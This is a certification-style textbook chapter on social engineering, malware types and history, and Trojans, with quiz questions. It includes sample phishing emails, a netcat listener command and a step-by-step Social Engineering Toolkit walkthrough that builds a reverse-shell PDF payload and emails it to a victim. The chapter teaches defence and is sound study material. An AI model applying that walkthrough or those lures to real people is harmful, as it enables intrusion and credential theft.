Chapter 5. Social Engineering, Malware Threats, and Vulnerability Analysis

This chapter covers the following topics:

  • Social Engineering: Social engineering will continue to be a real threat because it targets humans (which are considered the weakest link in cybersecurity).

  • Malware Threats and Countermeasures: Malware such as ransomware, viruses, worms, Trojans, root kits, keystroke loggers (keyloggers), and spyware are used by adversaries to attack numerous organizations and individuals.

  • Vulnerability Analysis: This section covers details about methodologies used to find and analyze security vulnerabilities and decrease the threat of malware.

This chapter covers the most common types of attacks and exploits. It starts by describing attacks against the weakest link, which is typically the human element. These attacks are called social engineering attacks. Social engineering has been the initial attack vector of many breaches and compromises in the past several years. In this chapter, you learn about different social engineering attacks, such as phishing, pharming, malvertising, spear phishing, whaling, and others. You will also learn social engineering techniques such as elicitation, interrogation, and impersonation, as well as different motivation techniques.

Malware continues to be used by many threat actors to compromise organizations and individuals. From traditional viruses and worms to sophisticated rootkits, ransomware, and advanced persistent threats, these malicious techniques represent a real danger to the security of any organization. In most cases, if an attacker can trick or seduce a user to install one of these programs, the attacker can gain full control of a compromised system. Much of this malware works under the principle of “you cannot deny what you must permit,” meaning that these programs use ports such as 25, 53, 443, and 80, which most organizations “leave open” (do not block them) because they could be mission critical and core Internet protocols.

This chapter also covers covert communications and examines some of the ways that adversaries can exfiltrate data. Spyware is also introduced. Spyware might perform any activity from keystroke logging, to pop-up ads, to pop-under ads, to tracking your activity.

At the end of this chapter, you will learn about vulnerability management and analysis.

“Do I Know This Already?” Quiz

The “Do I Know This Already?” quiz enables you to assess whether you should read this entire chapter thoroughly or jump to the “Exam Preparation Tasks” section. If you are in doubt about your answers to these questions or your own assessment of your knowledge of the topics, read the entire chapter. Table 5-1 lists the major headings in this chapter and their corresponding “Do I Know This Already?” quiz questions. You can find the answers in Appendix A, “Answers to the ‘Do I Know This Already?’ Quizzes and Review Questions.”

Table 5-1 “Do I Know This Already?” Section-to-Question Mapping

Foundation Topics Section

Questions

Social Engineering

1–5

Malware Threats and Countermeasures

6–14

Vulnerability Analysis

15–18

Caution

The goal of self-assessment is to gauge your mastery of the topics in this chapter. If you do not know the answer to a question or are only partially sure of the answer, you should mark that question as wrong for purposes of the self-assessment. Giving yourself credit for an answer you correctly guess skews your self-assessment results and might provide you with a false sense of security.

1. Which of the following attacks can be done by altering the host file on a victim’s system, through DNS poisoning, or by exploiting a vulnerability in a DNS server?

a. Phishing

b. SMS Phishing

c. Pharming

d. None of these answers are correct

2. Which of the following is an example of a tool that can be used to perform social engineering attacks?

a. Maltego

b. SET

c. The Harvester

d. Recon-NG

3. Which of the following best describes a phishing attack?

a. A social engineering attack in which the attacker presents to a user a link or an attachment that looks like a valid, trusted resource.

b. A social engineering attack in which the attacker calls the victim and makes him or her click a malicious link.

c. A social engineering attack that is similar to malvertising in which the attacker presents to a user a link or an attachment that looks like a valid, trusted resource.

d. An attack similar to whaling where the attacker performs a social engineering interrogation to persuade the victim to disclose sensitive information.

4. A number of attackers have used _____________ to send malware or malicious links to mobile devices.

a. Voice Phishing

b. Mobile Phishing

c. Mobile Device Management (MDM)

d. SMS Phishing

5. Which of the following best describes what is pretexting?

a. Impersonation

b. Social Engineering

c. Whaling

d. Pharming

6. Netcat is an example of which of the following?

a. Document Trojan that could be used to infect a system

b. Mac OS X Trojan that could be used for exfiltration

c. Credit card Trojan that could be used to steal credit card information

d. A Linux utility that could be used as a command shell Trojan

7. Tools used to combine a piece of malware with a legitimate program are known as what?

a. Fuzzers

b. Wrappers

c. Compilers

d. Binders

8. Which of the following is not a banking malware propagation technique?

a. TAN grabber

b. Code injection

c. Form grabber

d. HTML injection

9. KeyGhost is an example of what?

a. Software keylogger

b. Trojan

c. Hardware keylogger

d. Covert communication tool

10. Veriato Investigator is an example of what?

a. Software keylogger

b. Trojan

c. Hardware keylogger

d. Covert communication tool

11. If you approach a running system that you suspect may be infected, what might you do to quickly assess what is running on the system by using built-in applications?

a. CurrPorts

b. Fport

c. netstat -an

d. TList

12. Which of the following is not a valid virus type of infection?

a. Boot sector

b. Macro

c. Multipartite

d. Add-on shell

13. Which of the following is not a Trojan mitigation step?

a. User education

b. Manual updates

c. Isolate infected systems

d. Establish user practices built on a policy

14. What is the purpose of the command nc -l -v -n -p 80?

a. Redirect port 80 traffic

b. Set up a covert channel listening on port 80

c. Act as a keylogger on port 80

d. Block port 80

15. Which of the following is a vulnerability assessment methodology where the auditor may use methodologies for Windows-based systems that are different from Linux-based systems?

a. Product-based assessment

b. Tree-based assessment

c. Service-based assessment

d. Inference-based assessment

16. Which of the following is a vulnerability assessment methodology where the targeted host is not actively attacked?

a. Passive assessment

b. Tree-based assessment

c. Service-based assessment

d. Inference-based assessment

17. In CVSS, the ______ group represents the intrinsic characteristics of a vulnerability that are constant over time and do not depend on a user-specific environment. This metric group is the most important information in the scoring system and the only one that’s mandatory to obtain a vulnerability score.

a. temporal

b. base

c. environmental

d. None of these are correct.

18. Which of the following measures whether or not a public exploit is available?

a. CVSS base group scope metric

b. CVSS temporal group exploit code maturity metric

c. CVSS base group exploit metric

d. none of these are correct

Foundation Topics

Social Engineering

Social engineering attacks leverage the weakest link, which is typically the human user. If an attacker can get a user to reveal information, it is much easier for the attacker to cause harm than it is by using some other method of reconnaissance. Social engineering can be accomplished through email or misdirection of web pages, prompting a user to click something that leads to the attacker gaining information. Social engineering can also be done in person by an insider or an outside entity or over the phone.

A primary example is attackers leveraging normal user behavior. Suppose that you are a security professional who is in charge of the network firewalls and other security infrastructure equipment in your company. An attacker could post a job offer for a very lucrative position and make it very attractive to you, the victim. Suppose the job description lists benefits and compensation far beyond what you are already making at your company. You decide to apply for the position. The criminal (attacker) then schedules an interview with you. Because you are likely to “show off” your skills and work, the attacker may be able to get you to explain how you have configured the firewalls and other network infrastructure devices for your company. You might disclose information about the firewalls used in your network, how you have configured them, how they were designed, and so on. This gives the attacker a lot of knowledge about the organization without requiring the attacker to perform any type of scanning or reconnaissance on the network.

Let’s take a look at another example, suppose that you are a security guard and a pregnant woman comes to you saying that she is feeling sick and that she needs a bathroom immediately. You are courteous and escort her to the bathroom inside your premises, where she then uses her laptop to connect to your Wi-Fi or put a wireless rogue access point (AP) to lure some of your users to connect to such an AP. We are good and kind people (most of the time) and will continue to be the weakest link in the cybersecurity world because this human nature becomes our weakness.

Common social engineering techniques include the following:

  • Phishing

  • Pharming

  • Malvertising

  • Spear phishing

  • SMS phishing

  • Voice phishing

  • Whaling

  • Elicitation, interrogation, and impersonation

  • Shoulder surfing and USB key drop

These techniques are covered in detail in the sections that follow.

Phishing

Image

With phishing, an attacker presents to a user a link or an attachment that looks like a valid, trusted resource. When the user clicks it, he or she is prompted to disclose confidential information, such as his or her username and password. Example 5-1 shows an example of a phishing email.

Example 5-1 Phishing Email Example

Click here to view code image

Subject: PAYMENT CONFIRMATION
Message Body:

Dear sir,
Thank you for your order. I regret to inform you that the item is in
backorder.
The purpose of this email is to confirm whether or not payment has
been made for
the attached order. Otherwise, we will charge your account $490.32
within 1-2
business days. Kindly confirm receipt and advise.

Attachment: ORDER_123456.pdf
MD5 Checksum of the attachment: 0x8CB6D923E48B51A1CB3B080A0D43589D

The email in Example 5-1 includes an attachment (ORDER_123456.pdf) that contains a Trojan and can compromise the user’s system to steal sensitive information.

Pharming

Image

Pharming is the term used to describe a threat actor redirecting a victim from a valid website or resource to a malicious one that could be made to appear as the valid site to the user. From there, an attempt is made to extract confidential information from the user or to install malware in the victim’s system. Pharming can be done by altering the host file on a victim’s system, through DNS poisoning, or by exploiting a vulnerability in a DNS server. Figure 5-1 illustrates the mechanics of how pharming works.

Example of pharming attack is illustrated.

Figure 5-1 Pharming Example

The following steps are illustrated in Figure 5-1:

Step 1. The user (Omar) visits a legitimate website and clicks a legitimate link.

Step 2. Omar’s system is compromised, the host file is modified, and Omar is redirected to a malicious site that appears to be legitimate. (This could also be accomplished by compromising a DNS server or spoofing a DNS reply.)

Step 3. Malware is downloaded and installed on Omar’s system.

Malvertising

Malvertising is similar to pharming; however, it involves using malicious ads in the attack. In other words, malvertising is the act of incorporating malicious ads on trusted websites, which results in users’ browsers being inadvertently redirected to sites hosting malware. Figure 5-2 illustrates the mechanics of how malvertising works.

Illustration of advertising attack is illustrated.

Figure 5-2 Malvertising Example

The following steps are illustrated in Figure 5-2:

Step 1. The user (Omar) visits a legitimate website and clicks a malicious ad.

Step 2. Omar is redirected to a malicious site.

Step 3. Malware is downloaded and installed on Omar’s system and steals confidential data.

Note

Malicious ads could contain malicious code and payloads.

Spear Phishing

Image

Spear phishing is a special class of phishing. It is a phishing attack that is constructed in a very specific way and directly targeted to specific individuals or companies. The attacker studies a victim and the victim’s organization in order to be able to make the emails look legitimate and perhaps make them appear to come from trusted users within the corporation. Example 5-2 shows an example of a spear phishing email.

Example 5-2 Spear Phishing Email Example

Click here to view code image

From: Michael Gregg
To: Omar Santos
Subject:  Please review this chapter for me

Message Body:
Dear Omar,

Paul has been sending me a lot of emails lately regarding this
chapter. Please
review the attached document.

Regards,
Mike

Attachment: chapter.zip
MD5 Checksum of the attachment: 0x112223334455AC14444291AA1F911F3B1BE

In the email shown in Example 5-2, the threat actor has become aware that Mike and Omar are writing a book. The threat actor impersonates Mike and sends an email asking Omar to review a document (a chapter of the book). When the attachment is opened the system is compromised and malware is installed on Omar’s system.

Let’s take a look at an example of how to easily create a spear phishing email using the Social Engineering Toolkit (SET). The following are the steps:

Step 1. Launch SET by using the setoolkit command. You see the menu shown in Figure 5-3.

A screenshot of social engineering attacks is shown. The screen displays the following information: created by David Kennedy, version: 7.7.5, codename: blackout and so on. It also shows the menu list that is available in the SET framework. Option 99 is given for exiting the social-engineer tool kit.

Figure 5-3 SET Main Menu

Step 2. Select 1) Social-Engineering Attacks from the menu to start the social engineering attack. You now see the screen shown in Figure 5-4.

A screenshot of social engineering attacks is shown. The screen displays the following information: created by David Kennedy, version: 7.7.5, codename: blackout and so on. It also shows the menu list that is available in the SET framework for selecting the desired option to launch the attack. Option 99 is given for exiting the social-engineer tool kit.

Figure 5-4 Social Engineering Attack Menu in SET

Step 3. Select 1) Spear-Phishing Attack Vectors from the menu to start the spear-phishing attack you see on the screen shown in Figure 5-5.

A screenshot of social engineering attacks is shown.

Figure 5-5 Spear-Phishing Attack Menu

Step 4. To create a file format payload automatically, select 2) Create a FileFormat Payload, as shown in Figure 5-6.

A screenshot of social engineering attacks is shown.

Figure 5-6 Creating a FileFormat Payload

Step 5. Select 13) Adobe PDF Embedded EXE Social Engineering as the file format exploit to use. (The default is PDF Embedded EXE), as shown in Figure 5-7.

A screenshot of social engineering attacks depicts the selection of payload.

Figure 5-7 Selecting the Payload

Step 6. To have SET generate a normal PDF with an embedded EXE and also use a built-in blank PDF file for the attack, select 2) Use Built-In BLANK PDF for Attack, as shown in Figure 5-8.

Configuration of SET to spawn windows reverse TCP Shell on the Victim.

Figure 5-8 Configuring SET to Spawn a Windows Reverse TCP Shell on the Victim

SET gives you the option to spawn a command shell on the victim machine after a successful exploitation. Also, SET allows you to perform other post-exploitation activities, such as spawning a Meterpreter shell, Windows reverse VNC DLL, reverse TCP shell, Windows Shell Bind_TCP, or Windows Meterpreter Reverse HTTPS. Meterpreter is a post-exploitation tool that is part of the Metasploit framework.

Step 7. To use the Windows reverse TCP shell, select 1) Windows Reverse TCP Shell, as shown in Figure 5-9.

The screenshot depicts the generation of payload in SET.

Figure 5-9 Generating the Payload in SET

Step 8. When SET asks you to enter the IP address or the URL for the payload listener, select the IP address of the Kali Linux machines—172.18.104.166, which is the default option.

Step 9. When you are asked to enter the port that will be used by the victim’s system to connect back to you (the attacker), select the default port (443). The payload generation process starts. After the payload is generated, the screen shown in Figure 5-10 appears.

A screenshot of Social Engineering Toolkit payload window is shown with options for renaming the payload.

Figure 5-10 Renaming the Payload

Step 10. When SET asks if you want to rename the payload, select option 2: Rename the File, I Want to Be Cool, and enter chapter2.pdf as the new name for the PDF file.

Step 11. Select Option 1: Email Attack Single Email Address.

Step 12. When SET asks you if you want to use a predefined email template or create a one-time email template, select Option 2: One-Time Use Email Template.

Step 13. Follow along as SET guides you through the steps to create the one-time email message and enter the subject of the email.

Step 14. When SET asks if you want to send the message as an HTML message or in plain text, select plain text, which is the default.

Step 15. Enter the body of the message, shown earlier in Example 5-2. After you enter the text of the email body, press Ctrl+C.

Step 16. Enter the recipient email and specify whether you want to use a Gmail account, use your own email server, or an open mail relay. The email is then sent to the victim.

SMS Phishing

Because phishing has been an effective tactic for threat actors, they have found ways other than using email to fool their victims into following malicious links or activating malware from emails. A number of phishing campaigns have used Short Message Service (SMS) to send malware or malicious links to mobile devices.

One example of SMS phishing is the Bitcoin-related SMS scams that have surfaced in recent years. Numerous victims have received messages instructing them to click links to confirm their accounts and claim Bitcoins. When a user clicks such a link, he or she might be fooled into entering sensitive information on that attacker’s site.

Voice Phishing

Voice phishing (or vishing) is the name for a social engineering attack carried out over a phone conversation. The attacker persuades the user to reveal private, personal, and financial information or information about another person or a company. Voice phishing is typically used to steal credit card numbers or other information used in identity theft schemes. Attackers might impersonate and spoof caller ID to obfuscate themselves when performing voice phishing attacks.

Whaling

Whaling is similar to phishing and spear phishing; however, with whaling, the attack is targeted at high-profile business executives and key individuals in a corporation. So, what is the difference between whaling and spear phishing? Like threat actors conducting spear phishing attacks, threat actors conducting whaling attacks also create emails and web pages to serve malware or collect sensitive information; however, the whaling attackers’ emails and pages have a more official or serious look and feel. Whaling emails are designed to look like a critical business email or something from someone who has legitimate authority, either externally or even internally from the company itself. In whaling attacks, web pages are designed to specifically address high-profile victims. In a regular phishing attack, the email might be a faked warning from a bank or service provider. In whaling attacks, the email or a web page would be created with a more serious executive-level form. The content is created to target an upper manager, such as the CEO, or an individual who might have credentials for valuable accounts within the organization. In summary, a whaling attack takes additional steps to target and entice higher profile victims.

The main goal in whaling attacks is to steal sensitive information or compromise the victim’s system and then target other key high-profile victims.

Attackers could use multifaceted attacks (also known as combined social engineering attacks). For instance, an attacker could send a spear phishing email to a victim and then follow up with a phone call. This makes the attack even more effective.

Elicitation, Interrogation, and Impersonation (Pretexting)

Image

How someone influences, interrogates, and impersonates others are key components of social engineering. In short, elicitation is the act of gaining knowledge or information from people. In most cases, an attacker gets information from the victim without directly asking for that particular information.

How an attacker interrogates and interacts with a victim is crucial for the success of the social engineering campaign. An interrogator can ask good open-ended questions to learn about an individual’s viewpoints, values, and goals. The interrogator can then use any information revealed to continue to gather additional information or to obtain information from another victim.

It is also possible for an interrogator to use closed-ended questions to get more control of the conversation and to lead the conversation or to stop the conversation. Asking too many questions can cause the victim to shut down the interaction, and asking too few questions might seem awkward. Successful social engineering interrogators use a narrowing approach in their questioning to gain the most information from the victim.

Interrogators pay close attention to the following:

  • The victim’s posture or body language

  • The color of the victim’s skin, such as the victim’s face color becoming pale or red

  • The direction of the victim’s head and eyes

  • Movement of the victim’s hands and feet

  • The victim’s mouth and lip expressions

  • The pitch and rate of the victim’s voice, as well as changes in the voice

  • The victim’s words, including their length, the number of syllables, dysfunctions, and pauses

With pretexting—or impersonation—an attacker presents as someone else in order to gain access to information. In some cases, it can be very simple, such as quickly pretending to be someone else within an organization; in other cases, it can involve creating a whole new identity and then using that identity to manipulate the receipt of information. Social engineers might use pretexting to impersonate individuals in certain jobs and roles, even if they do not have experience in those jobs or roles.

For example, a social engineer might impersonate an IT support worker and provide unsolicited help to a user. Impersonating IT staff can be very effective because if you ask someone if he or she has a technical problem, it is quite likely that the victim will think about it and say something like, “Yes, as a matter of fact…yesterday, this weird thing happened to my computer.” Impersonating IT staff can give an attacker physical access to systems in the organization. The attacker who has physical access can use a USB stick containing custom scripts to compromise a computer within seconds.

Social Engineering Motivation Techniques

The following are several motivation techniques used by social engineers:

  • Authority: A social engineer shows confidence and perhaps authority—whether legal, organizational, or social authority.

  • Scarcity and urgency: It is possible to use scarcity to create a feeling of urgency in a decision-making context. Specific language can be used to heighten urgency and manipulate the victim. Salespeople often use scarcity to manipulate clients (for example, telling a customer that an offer is for today only or that there are limited supplies). Social engineers use similar techniques.

  • Social proof: Social proof is a psychological phenomenon in which an individual is not able to determine the appropriate mode of behavior. For example, you might see others acting or doing something in a certain way and might assume that it is appropriate. Social engineers might use this tactic when an individual enters an unfamiliar situation that he or she doesn’t know how to deal with. Social engineers might manipulate multiple people at once by using this technique.

  • Likeness: Individuals can be influenced by things or people they like. Social engineers strive for others to like the way they behave, look, and talk. Most individuals like what is aesthetically pleasing. People also like to be appreciated and to talk about themselves. Social engineers take advantage of these human vulnerabilities to manipulate their victims.

  • Fear: It is possible to manipulate a person with fear to prompt him or her to act promptly. Fear is an unpleasant emotion based on the belief that something bad or dangerous might take place. Using fear, social engineers force their victims to act quickly to avoid or rectify a perceived dangerous or painful situation.

Shoulder Surfing and USB Key Drop

With shoulder surfing, someone obtains information, such as personally identifiable information (PII), passwords, and other confidential data, by looking over the victim’s shoulder. One way to do this is to get close to a person and look over his or her shoulder to see what the person is typing on a laptop, phones, or tablets. It is also possible to carry out this type of attack from far away by using binoculars or even a telescope. These attacks tend to be especially successful in crowded places. Shoulder surfing can also be accomplished with small hidden cameras and microphones.

Many pen testers and attackers have successfully compromised victim systems by just leaving USB sticks (sometimes referred to as USB keys or USB pen drives) unattended or placing them in strategic locations. Often, users think that the devices are lost and insert them into their systems to figure out who to return the devices to; before they know it, they might be downloading and installing malware. Plugging in that USB stick you found lying around on the street outside your office could lead to a security breach.

Another social engineering technique is to drop a key ring containing a USB stick that could also include pictures of kids or pets and an actual key or two. Or a USB key labeled as “spring break pictures and nudes.” These types of personal touches might prompt a victim to try to identify the owner in order to return the keychain. This type of social engineering attack is very effective and also can be catastrophic.

Malware Threats

Malicious code, or malware, includes viruses, ransomware, rootkits, worms, Trojan horses, backdoors, covert channel tools, spyware, and advanced persistent threats (APTs). Malware can cause a wide range of damage, from displaying messages, to making programs work erratically, encrypting files, and asking for a ransom to decrypt them, to even to destroying data or hard drives.

Viruses and Worms

One thing that makes viruses unique is that a virus typically needs a host program or file to infect. Viruses require some type of human interaction. A worm can travel from system to system without human interaction. When a worm executes, it can replicate again and infect even more systems. For example, a worm can email itself to everyone in your address book and then repeat this process again and again from each user’s computer it infects. That massive amount of traffic can lead to a denial of service very quickly.

Spyware is closely related to viruses and worms. Spyware is considered another type of malicious software. In many ways, spyware is similar to a Trojan because most users don’t know that the program has been installed, and the program hides itself in an obscure location. Spyware steals information from the user and also eats up bandwidth. If that’s not enough, spyware can also redirect your web traffic and flood you with annoying pop-ups. Many users view spyware as another type of virus.

This section covers a brief history of computer viruses, common types of viruses, and some of the most well-known virus attacks. Also, some tools used to create viruses and the best methods of prevention are discussed.

Types and Transmission Methods of Viruses and Malware

Image

Although viruses have a history that dates back to the 1980s, their means of infection has changed over the years. Viruses depend on people to spread them. Viruses require human activity, such as booting a computer, executing an autorun on digital media (for example, CD, DVD, USB sticks, external hard drives, and so on), or opening an email attachment. Viruses propagate through the computer world in several basic ways:

  • Master boot record infection: This is the original method of attack. It works by attacking the master boot record of the hard drive.

  • BIOS infection: This could completely make the system inoperable or the device could hang before passing Power On Self-Test (POST).

  • File infection: This is a slightly newer form of the virus that relies on the user to execute the file. Extensions such as .com and .exe are usually used. Some form of social engineering is normally used to get the user to execute the program. Techniques include renaming the program or trying to mask the .exe extension and make it appear as a graphic (.jpg, .bmp, .png, .svg, and the like).

  • Macro infection: The next type of virus began appearing in the 1990s. Macro viruses exploit scripting services installed on your computer. Manipulating and using macros in Microsoft Excel, Microsoft Word, and Microsoft PowerPoint documents have been very popular in the past.

  • Cluster: This type of virus can modify directory table entries so that it points a user or system process to the malware and not the actual program.

  • Multipartite: This style of virus can use more than one propagation method and targets both the boot sector and program files. One example is the NATAS (Satan spelled backward) virus.

Note

Know the primary types of virus attack mechanisms: master boot record, file infector, macro infector, and others listed previously.

After your computer is infected, the malware can do any number of things. Some spread quickly. This type of virus is known as a fast infection. Fast-infection viruses infect any file that they are capable of infecting. Others limit the rate of infection. This type of activity is known as sparse infection. Sparse infection means that the virus takes its time in infecting other files or spreading its damage. This technique is used to try to help the virus avoid infection. Some viruses forgo a life of living exclusively in files and load themselves into RAM, which is the only way that boot sector viruses can spread.

As the antivirus and security companies have developed better ways to detect malware, malware authors have fought back by trying to develop malware that is harder to detect. For example, in 2012, Flame was believed to be the most sophisticated malware to date. Flame has the ability to spread to other systems over a local network. It can record audio, screenshots, and keyboard activity, and it can turn infected computers into Bluetooth beacons that attempt to download contact information from nearby Bluetooth-enabled devices. Another technique that malware developers have attempted is polymorphism. A polymorphic virus can change its signature every time it replicates and infects a new file. This technique makes it much harder for the antivirus program to detect it. One of the biggest changes is that malware creators don’t massively spread viruses and other malware the way they used to. Much of the malware today is written for a specific target. By limiting the spread of the malware and targeting only a few victims, finding out about the malware and creating a signature to detect it is much harder for antivirus companies.

When is a virus not a virus? When is the virus just a hoax? A virus hoax is nothing more than a chain letter, meme, or email that encourages you to forward it to your friends to warn them of impending doom or some other notable event. To convince readers to forward the hoax, the email will contain some official-sounding information that could be mistaken as valid.

Virus Payloads

Viruses must place their payload somewhere. They can always overwrite a portion of the infected file, but to do so would destroy it. Most virus writers want to avoid detection for as long as possible and might not have written the program to immediately destroy files. One way the virus writer can accomplish this is to place the virus code either at the beginning or the end of the infected file. A virus known as a prepender infects programs by placing its viral code at the beginning of the infected file. Appenders infect files by placing their code at the end of the infected file. Both techniques leave the file intact, with the malicious code added to the beginning or the end of the file.

No matter what infection technique, all viruses have some basic common components. All viruses have a search routine and an infection routine.

  • Search routine: The search routine is responsible for locating new files, disk space, or RAM to infect. The search routine could include “profiling.” Profiling could be used to identify the environment and morph the malware to be more effective and potentially bypass detection.

  • Infection routine: The search routine is useless if the virus doesn’t have a way to take advantage of these findings. Therefore, the second component of a virus is an infection routine. This portion of the virus is responsible for copying the virus and attaching it to a suitable host. Malware could also use a reinfect/restart routine to further compromise the affected system.

  • Payload: Most viruses don’t stop here and also contain a payload. The purpose of the payload routine might be to erase the hard drive, display a message to the monitor, or possibly send the virus to 50 people in your address book. Payloads are not required, and without one, many people might never know that the virus even existed.

  • Anti-detection routine: Many viruses might also have an antidetection routine. Its goal is to help make the virus more stealth-like and avoid detection.

  • Trigger routine: Its goal is to launch the payload at a given date and time. The trigger can be set to perform a given action at a given time.

Figure 5-11 shows the various components of a computer virus.

A block diagram shows the different components of a computer virus.

Figure 5-11 Virus Components

History of Viruses

Computer viruses are not a product of nature. The phrase computer virus did not even come into use until about 1984 when Fred Cohen was working on his doctoral thesis. In his thesis, he was discussing self-replicating programs; an advisor suggested that he call them computer viruses. The mid-1980s proved to be a time of growth for all types of computer virus research. In 1985, Ralf Burger, a German computer systems engineer, created one of the first self-replication programs, Virdem. Interest in malicious, self-replicating programs led Mr. Burger to give the keynote speech at the Chaos Computer Club later that year. His discussion on computer viruses encouraged others in this emerging field. Soon, many viruses started to be released into the wild. By 1987, it was clear that some people had latched onto the malicious power of computer viruses as the first documented computer attack was recorded at the University of Delaware. This was identified as the Brain virus. Buried within the code was the following message:

Welcome to the dungeon
Brain Computer Services
730 Nizab Block Allama Iqbal Town
Lahore Pakistan
Beware of this virus

Viruses can be used to make a statement or to destroy data, market their developers as skilled coders, or choke bandwidth and attack availability. The Brain virus actually did little damage; its creators saw it as a way to promote themselves and their computer services.

Well-Known Viruses and Worms

Since the 1980s, there have been a series of well-known viruses and worm attacks. Viruses are written for a variety of reasons, ranging from an innocuous attempt to make a political statement, master a technical challenge, or gain notoriety, to more sinister purposes such as to exact revenge or to steal or extort money. Although many virus writers have not been caught, others have and have had to pay the price in jail time and financial penalties. Most virus writers prefer to remain anonymous; however, they do typically pick the names of their creations. Antivirus experts almost always name the virus something else and go by specific guidelines to name malicious code. Although it is not a totally random process, it can be driven by the events surrounding the code. For example, Code Red gained its name from the fact that the fruit-punch-flavored Mountain Dew beverage of the same name is what researchers were drinking the night they first dissected the virus’s code.

The first known worm to be released on the Internet was the 1988 RTM worm. It was developed by Robert T. Morris Jr. and was meant to be only a proof of concept. The Worm targeted the debug feature in Sendmail to propagate. The small program disabled roughly 6,000 computers connected to the Internet. Its accidental release brought home the fact that worms can do massive damage to the Internet. The cost of the damage from the worm was estimated to be between $10 and $100 million. Robert Morris was convicted of violating the Computer Fraud and Abuse Act and sentenced to 3 years of probation, 400 hours of community service, a fine of $10,050, and the costs of his supervision.

Viruses propagate through the computer world in several basic ways:

  • Melissa: By the late 1990s, rumors began to circulate of a new form of virus on the horizon known as the macro virus, and in 1999, these rumors proved to be true, with the mass infection of the Melissa macro virus. Melissa had all the traits of a hybrid worm and had the capability to spread itself rapidly through email. The creator of Melissa, David Smith, was identified and eventually sentenced to five years in prison.

  • Code Red: The Code Red worm surfaced in 2001. Code Red went on to infect tens of thousands of systems running Microsoft Windows NT and Windows 2000 Server software. The Code Red worm exploited the .ida buffer overflow vulnerability. Code Red was unique in that it attacked, compromised, and then targeted other computers.

  • Nimda: In the wake of September 11, 2001, thousands of computers around the world were attacked by Nimda. The Nimda worm was considered advanced at the time in the ways it could propagate itself. Nimda targeted Windows IIS web servers that were vulnerable to the Unicode Web Traversal exploit. Nimda used its own internal mail client, making it difficult for individuals to determine who really sent the infected email. If that wasn’t enough, Nimda could also add itself to executable files to spread itself to other victims. Nimda would scan to detect additional systems that were vulnerable to attack.

  • Slammer: The Slammer worm arrived in 2003. It infected hundreds of thousands of computers in less than three hours and was the fastest spreading worm to date until the MyDoom worm was released in 2004.

  • MyDoom: MyDoom works by trying to trick people to open an email attachment that contains the worm. It claims to be a notification that an email message sent earlier has failed and prompts the user to open the attachment to see what the message text originally said. The MyDoom worm was the first to change the hosts file to block security-related sites and to block Windows Update from running.

  • Sasser: The Sasser worm was also released in 2004. The Sasser worm targets a security issue with the Local Security Authority Subsystem Service, lsass.exe. Sven Jaschan, an 18-year-old computer enthusiast, received a sentence of 1 year and 9 months on probation and 30 hours of community service for creating the Sasser worm and the Netsky virus.

  • Storm: Storm, which some describe as a bot/worm hybrid, was identified around 2007, and was designed for various activities such as spam, password collection, and credit card number theft.

  • Conficker: Conficker is a computer worm targeting the Microsoft Windows operating system and was first detected in November 2008. Conficker targeted flaws in Windows software and used dictionary attacks on administrator passwords to propagate.

  • Ransomware: Over the past few years, many of the biggest threats have been more general categories of malware and not always true viruses or worms. One example is ransomware. Ransomware can propagate like a worm or a virus but is designed to encrypt personal files on the victim’s hard drive until a ransom is paid to the attacker. Ransomware has been around for many years but made a comeback in recent years. Some examples of ransomware include WannaCry, Nyeta, Pyeta, Bad Rabbit, Grandcrab, SamSam, CryptoLocker, Crypto Defense, CryptoWall, and Spora.

Even though many virus writers have escaped harsh criminal penalties, virus writing is not always a profitable career.

Virus Creation Tools

Virus creators tend to be from several groups. In the past, many viruses were created by students who had just started to learn a programming language and wanted to see what they could do. Some virus writers are individuals who want attention and are eager to show off their skills. Yet other, more experienced virus writers create professional viruses and let them out to the world. These individuals typically profit from the creation of malware. These elaborate and smoothly running programs are created by professional programmers. Creating these elaborate viruses takes a certain amount of technical skill. A computer virus is no different from any other computer program. The developer must have some knowledge of C programming, Visual Basic, a macro language, or other program language such as Assembly. Without those skills, it is still possible to create a computer virus, but a tool or existing virus is usually required. Virus writers can disassemble existing virus code and make subtle changes or download existing virus code.

For the script kiddie, there are always virus toolkits. Many of these are available on the Internet. Examples include the following:

  • Sam’s Virus Generator

  • JPS Virus Maker

  • Andreinicks05’s Virus Maker

  • Deadlines Virus Maker

  • Sonic Bat Virus Creator

  • Poison Virus Maker

  • Internet Work Maker Thing

These kits are easy to use, which means that almost anyone can easily create a virus with them. Most are point-and-click GUI applications. Their limitation is that the viruses they create are variations of basic designs; therefore, antivirus providers have become adept at countering them.

Trojans

Trojans are programs that pretend to do one thing but, when loaded, actually perform another more malicious act. Trojans gain their name from Homer’s epic tale, The Iliad. To defeat their enemy, the Greeks built a giant wooden horse with a trapdoor in its belly. The Greeks tricked the Trojans into bringing the large wooden horse into the fortified city of Troy. However, unknown to the Trojans and under cover of darkness, the Greeks crawled out of the wooden horse, opened the city’s gate, and allowed the waiting soldiers into the city.

A software Trojan horse is based on this same concept. A user might think that a file looks harmless and is safe to run, but after the file is executed, it delivers a malicious payload. Trojans work because they typically present themselves as something you want, such as an email with a PDF, a Word document, or an Excel spreadsheet. Trojans work hard to hide their true purposes. The spoofed email might look like it’s from HR, and the attached file might purport to be a list of pending layoffs. The payload is executed if the attacker can get the victim to open the file or click the attachment. That payload might allow a hacker remote access to your system, start a keystroke logger to record your every keystroke, plant a backdoor on your system, cause a denial of service (DoS), or even disable your antivirus protection or software firewall.

Unlike a virus or worm, Trojans cannot spread themselves. They rely on the uninformed user.

Trojan Types

EC-Council groups Trojans into some primary types, which is simply their way of organizing them. Some basic categories recognized by EC-Council include command shell Trojans, graphical user interface (GUI) Trojans, HTTP/HTTPS Trojans, document Trojans, defacement Trojans, botnet Trojans, Virtual Network Computing (VNC) Trojans, remote-access Trojans, data-hiding Trojans, banking Trojans, DoS Trojans, FTP Trojans, software-disabling Trojans, and covert-channel Trojans. In reality, it’s hard to place some Trojans into a single type because many have more than one function. To better understand what Trojans can do, a few of these types are outlined in the following list:

  • Remote access: Remote-access Trojans (RAT) allow the attacker full control over the system. Poison Ivy is an example of this type of Trojan. Remote-access Trojans are usually set up as client/server programs so that the attacker can connect to the infected system and control it remotely.

  • Data hiding: The idea behind this type of Trojan is to hide a user’s data. This type of malware is also sometimes known as ransomware. This type of Trojan restricts access to the computer system that it infects, and it demands a ransom paid to the creator of the malware for the restriction to be removed.

  • E-banking: These Trojans (Zeus is one such example) intercept and use a victim’s banking information for financial gain. Usually, they function as a transaction authorization number (TAN) grabber, use HTML injection, or act as a form grabber. The sole purpose of these types of programs is financial gain.

